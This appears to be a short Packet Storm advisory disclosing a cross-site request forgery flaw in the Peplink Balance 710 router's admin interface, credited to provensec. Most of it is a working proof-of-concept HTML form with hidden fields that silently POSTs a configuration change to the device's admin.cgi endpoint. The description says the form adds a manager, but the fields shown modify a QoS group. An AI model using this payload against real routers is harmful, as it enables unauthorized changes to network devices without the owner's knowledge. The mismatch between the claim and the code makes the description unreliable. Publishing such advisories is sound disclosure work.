Paperlink Balance 710 suffers from a cross site request forgery vulnerability.
383566478a99a0be1dbd4b3452eb1c4186a558cbca37e101d80511ba58fe3b08# Affected software: paperlink balance 710
# Type of vulnerability:csrf
# URL:peplink.com <http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi>
# Discovered by: provensec
# Website: provensec.com
#version:710
# Proof of concept
a new manager can be added using csrf attack
<html>
<body>
<form action="http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi"
method="POST">
<input type="hidden" name="section" value="EQOS_group_modify"
/>
<input type="hidden" name="rule_id" value="" />
<input type="hidden" name="iptype" value="0" />
<input type="hidden" name="ipaddr" value="123.123.1.23" />
<input type="hidden" name="netmask" value="24" />
<input type="hidden" name="group" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed